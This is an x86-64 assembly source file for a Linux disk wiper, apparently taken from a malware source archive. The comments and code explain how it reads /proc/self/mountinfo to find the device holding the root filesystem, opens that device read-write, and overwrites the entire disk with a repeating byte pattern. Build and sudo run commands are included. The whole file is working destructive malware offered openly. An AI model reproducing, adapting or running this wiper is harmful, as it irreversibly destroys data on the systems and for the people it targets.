MalwareSourceCode/Linux/Infectors/Linux.Precinct3.asm

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;-------------------------------------------------------------------------------
; /!\ WARNING /!\
; This program WILL destroy your disk. Run at your own risk, and only
; on systems you are authorized to destroy.
;
; This program opens /proc/self/mountinfo to enumerate filesystems and disks.
; It finds where the filesystem root (/) is mounted, and writes a pattern to
; the entirety of the disk.
;
; Using /proc/self/mountinfo to find / :
;
; [ EXAMPLE ]
;
; $ grep '/ / ' /proc/self/mountinfo
; 32 1 259:2 / / rw,relatime shared:1 - ext4 /dev/nvme0n1p2 rw,errors=remount-ro
; $ grep '/ / ' /proc/self/mountinfo
; 25 0 8:0 / / rw,relatime shared:1 - ext4 /dev/sda rw,errors=remount-ro
;
; Build:
; $ nasm -f elf64 p3.asm ; ld p3.o -o p3
; Run:
; $ sudo ./p3
;----------------------------------------------------------------- @netspooky --
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section .text ;
global _start ;
_start: ;
mov rdi, 0x6f666e69 ; Pushing the ;
push rdi ; file name ;
mov rdi, 0x746e756f6d2f666c ; /proc/self/mountinfo ;
push rdi ; onto the stack ;
mov rdi, 0x65732f636f72702f ; ... ;
push rdi ; ... ;
mov rdi, rsp ; const char *pathname ;
xor rsi, rsi ; int flags - O_RDONLY ;
mov rax, rsi ; 0 ;
inc rax ; 1 ;
inc rax ; 2 - open syscall ;
syscall ; ;
reader: ; Reading /proc/self/mountinfo so we can parse it. ;
inc rdx ; 1 ;
shl rdx, 14 ; size_t count - # of bytes to read - 0x400 ;
sub rsp, rdx ; Make space on the stack - 0x400 ;
mov r9, rax ; Save fd in r9 for later ;
mov rdi, rax ; int fd - The file descriptor ;
mov rsi, rsp ; void *buf - The buffer that is the stack ;
xor eax, eax ; 0 - read syscall ;
syscall ; RSI still contains the buffer after syscall ;
mov di, 0x202f ; '/ ' - The byte pattern to look for ;
xor rcx, rcx ; 0 ;
inc rcx ; 1 ;
shl rcx, 14 ; 0x400 - Counter for reading the file chunk ;
comp1: ; Looking for the first slash and space in each entry ;
mov bx, word[rsp] ; Move word to bl ;
cmp di, bx ; Compare to the '/ ' pattern ;
je comp2 ; Disk entry found, onto next comparison ;
dec rcx ; Decrement counter ;
jz xxit ; Jump if zero to the end ;
inc rsp ; Read the next byte in the file ;
jmp comp1 ; Jump back to the top ;
comp2: ; Here we are looking for the next slash and space ;
inc rsp ; Since we already know the two bytes at the ;
inc rsp ; pointer, inc twice to get next two bytes ;
mov bx, word[rsp] ; Move word to bl ;
cmp di, bx ; Make the same comparison to '/ ' ;
je comp3 ; Disk holding / was found ;
dec rcx ; Decrement counter ;
jz xxit ; Jump if zero to the end ;
dec rcx ; Decrement counter ;
jz xxit ; Jump if zero to the end ;
inc rsp ; If we didn't find anything, keep going ;
jmp comp1 ; And back to first comparison ;
comp3: ; At this point, we have located the '/ / ' record, so we can look for ;
; the next slash in the disk name ;
inc rsp ; Increment through the rest of the line ;
mov bl, byte[rsp] ; Get just one byte now ;
cmp dil, bl ; dil contains '/' ;
je prep ; If we found it, we have the disk name ;
jmp comp3 ; If not, keep going ;
prep: ; Preparing for the final comparison ;
xor rcx, rcx ; This will hold the length of the disk name ;
mov dil, 0x20 ; We are now looking for a space. ;
getdisk: ; Here we are grabbing the entire disk name ;
inc rsp ; Increment the index ;
inc rcx ; Increment our length counter ;
mov bl, byte[rsp] ; Grab a byte ;
cmp dil, bl ; Compare to a ' ' char ;
je opendisk ; If it matches, we found it! ;
jmp getdisk ; If not, keep going! ;
opendisk: ; Now we are going to open the disk as a file as we did earlier. ;
xor rsi, rsi ; 0 ;
add rsp, 8 ; Pushing a 0 for the null... ;
push rsi ; ...terminator on the disk name string. ;
sub rsp, rcx ; Now RSP points to the disk name ;
mov rdi, rsp ; const char *pathname - pointer to disk name ;
inc rsi ; 1 ;
inc rsi ; 2 - O_RDWR ;
mov rax, rsi ; 2 - open syscall ;
syscall ;
writer: ; We now have the disk open in RW mode, no append. ;
mov rdi, rax ; int fd - The file descriptor ;
mov rsi, 0x7557575757575775 ; This is the marker payload - uWWWWWWu ;
push rsi ; Push the payload ;
mov rsi, rsp ; const void *buf - Payload pointer ;
xor rax, rax ; 0 ;
inc rax ; 1 - write syscall ;
mov rdx, rax ; Get that 1 ;
shl rdx, 3 ; 8 size_t count - # of bytes to write ;
syscall ;
lseeker: ; We have to set up the lseek call so that we will continue writing ;
; to the next byte in the file upon each additional write. ;
xor rdx, rdx ; 0 ;
inc rdx ; int whence; 1 = SEEK_SET ;
mov rsi, rdx ; 1 ;
shl rsi, 3 ; off_t offset; 8 - # of bytes to seek ;
mov rax, rsi ; 8 - lseek syscall ;
syscall ; Note that RDI still contains fd ;
writer2: ; The final write loop, likely segfaults ;
mov rsi, 0xABACABACABACABAC ; This is the pattern payload ;
push rsi ; Push the payload ;
mov rsi, rsp ; const void *buf - Payload pointer ;
xor rax, rax ; 0 ;
inc rax ; 1 - write syscall ;
mov rdx, rax ; Get that 1 ;
shl rdx, 3 ; 8 size_t count - # of bytes to write ;
syscall ;
jmp writer2 ; Bring it around town ;
xxit: ; This is really only here in case of failure ;
mov al, 0x3c ; exit syscall ;
xor rdi, rdi ; 0 - Return code ;
syscall ;------------------------------------------------------------------;
; Dedicated to those fighting for police accountability worldwide. ;
;------------------------------------------------------------------;